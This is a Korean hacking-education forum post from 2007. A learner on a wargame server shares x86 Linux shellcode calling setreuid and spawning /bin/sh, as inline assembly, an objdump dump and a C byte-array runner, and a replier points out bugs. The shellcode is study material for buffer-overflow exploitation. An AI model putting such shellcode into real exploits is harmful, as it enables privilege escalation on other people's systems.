시스템 해킹

1574,

7/79

binoopang

http://mercury.chonnam.ac.kr/~dalkong/

쉘코드를 만들었는데 질문이 있습니다

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=742 [복사]

안녕하세요 BOF를 공부하면서 쉘코드를 만들었습니다.
여기 해커스쿨 서버를 사용했는데요 ..
레벨 9 에서 쉘코드를 만들어서 레벨 1에서 쉘코드를 실행하면 uid가
레벨 9로 바뀌게 만들었습니다.
문제는 이게 어셈블리코드로 코딩한걸 컴파일하면 제대로 작동하는데
이것을 기계어로 바꿔서 c언어로 코딩한다음 실행하면 쉘은 띄워지는데
uid 는 바뀌지가 않습니다.
저의 쉘코드를 올립니다!

--------------- 쉘코드 (어셈블리 코드) ------------------------------

void main()
{
// 이부분이 setreuid 부분입니다.
__asm__ __volatile__(
"mov $0xbc1, %bx        \n\t" // NULL제거 하려고 bx에 3009(uid)넣었습니다.
"mov $0xbc1, %cx        \n\t" // NULL제거 하려고 cx에 3009(uid)넣었습니다.
"mov $0x46, %al \n\t" // setreuid 번호인 46을 al에 넣었구요.
"int $0x80      \n\t" // 인터럽트를 걸었습니다.

// 여기서부터는 쉘코드 입니다.
"xor %eax, %eax \n\t"
"push %eax      \n\t"
"push $0x68732f2f       \n\t"
"push $0x6e69622f       \n\t"
"mov %esp, %ebx \n\t"
"push %eax      \n\t"
"push %ebx      \n\t"
"mov %esp, %ecx \n\t"
"mov %eax, %edx \n\t"
"mov $0xb, %al  \n\t"
"int $0x80      \n\t"
);
}

---------------------------------------------------------------

위의 소스는 컴파일하면 잘 작동합니다. 컴파일끝나고 레벨9로
setuid 비트 걸어주고나서 레벨1에서 실행하면 uid가 레벨9로 바뀝니다.

이번에는 위에 소스를 컴파일하고나서 objdump로 뜬것입니다.

---------------------------------------------------------------------

080482f4 <main>:
80482f4:       55                      push   %ebp
80482f5:       89 e5                   mov    %esp,%ebp
80482f7:       83 ec 08                sub    $0x8,%esp
80482fa:       83 e4 f0                and    $0xfffffff0,%esp
80482fd:       b8 00 00 00 00          mov    $0x0,%eax
8048302:       29 c4                   sub    %eax,%esp
8048304:       66 bb c1 0b             mov    $0xbc1,%bx
8048308:       66 b9 c1 0b             mov    $0xbc1,%cx
804830c:       b0 46                   mov    $0x46,%al
804830e:       cd 80                   int    $0x80
8048310:       31 c0                   xor    %eax,%eax
8048312:       50                      push   %eax
8048313:       68 2f 2f 73 68          push   $0x68732f2f
8048318:       68 2f 62 69 6e          push   $0x6e69622f
804831d:       89 e3                   mov    %esp,%ebx
804831f:       50                      push   %eax
8048320:       53                      push   %ebx
8048321:       89 e1                   mov    %esp,%ecx
8048323:       89 c2                   mov    %eax,%edx
8048325:       b0 0b                   mov    $0xb,%al
8048327:       cd 80                   int    $0x80
8048329:       c9                      leave
804832a:       c3                      ret
804832b:       90                      nop

---------------------------------------------------------------------

main 부분만 따로 뺐습니다. 위와같이 나와서 이제 기계어 부분만 따로
빼서 코딩을 했습니다. 이제 아래에 나오는 소스가 문제의 소스입니다.

---------------------------------------------------------------------

char sc[] =
// 이부분이 setreuid()부분입니다.
"\x66\xbb\xc1\x0b\x66\xb9\xc1\x0b\xb0\x46\xcd\x80"
// 아래부분은 쉘코드 부분입니다.
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";

int main()
{
        void (*pointer)(void);
        pointer=(void*)sc;
        pointer();
}

----------------------------------------------------------------------
이걸 컴파일하고나서 레벨9로 setuid 비트 걸어준다음 레벨1에서 실행하면
레벨9로 uid가 바뀌어야 하는데 바뀌지 않습니다.
단지 쉘만 뜹니다.. (레벨1의 쉘)

이유가 무엇인지 모르겠습니다. 어셈블리 코드는 잘 작동하는데 똑같이
기계어로만 바꾸었는데 작동이 안됩니다 ..

에구 질문이 너무 길었네요 ...
혹시 아시는분 답변 부탁드립니다 ㅠ

좋은 밤 되세요 ~

Hit : 3801 Date : 2007/07/14 12:07


indra	죄송합니다만... 맨 위의 코드도 잘못 만드셨습니다... xor로 레지스터를 초기화 시키지 않고 하위 주소로 값을 쓴 거 같은데 실행 안 될 것 같군요...	2007/07/18
indra	만약 쉘이 level9 권한으로 떴다면... setuid 를 걸었기 때문이지, setreuid의 영향이 아닐 것 같습니다... strace 라는 명령이 있으니 그 명령으로	2007/07/18
indra	위의 코드들을 실행하여 setreuid()가 잘 실행되는지 검사해 보세요..	2007/07/18
indra	그리고 아래의 C코드도... objdump를 뜬 제일 처음, push %ebp 인 \x55 부터 적어주는게 맞습니다..	2007/07/18
indra	삽질 열심히 하셔서 좋은결과 있기를 바랄께요... 삽질이 최곱니다.. ㅋ	2007/07/18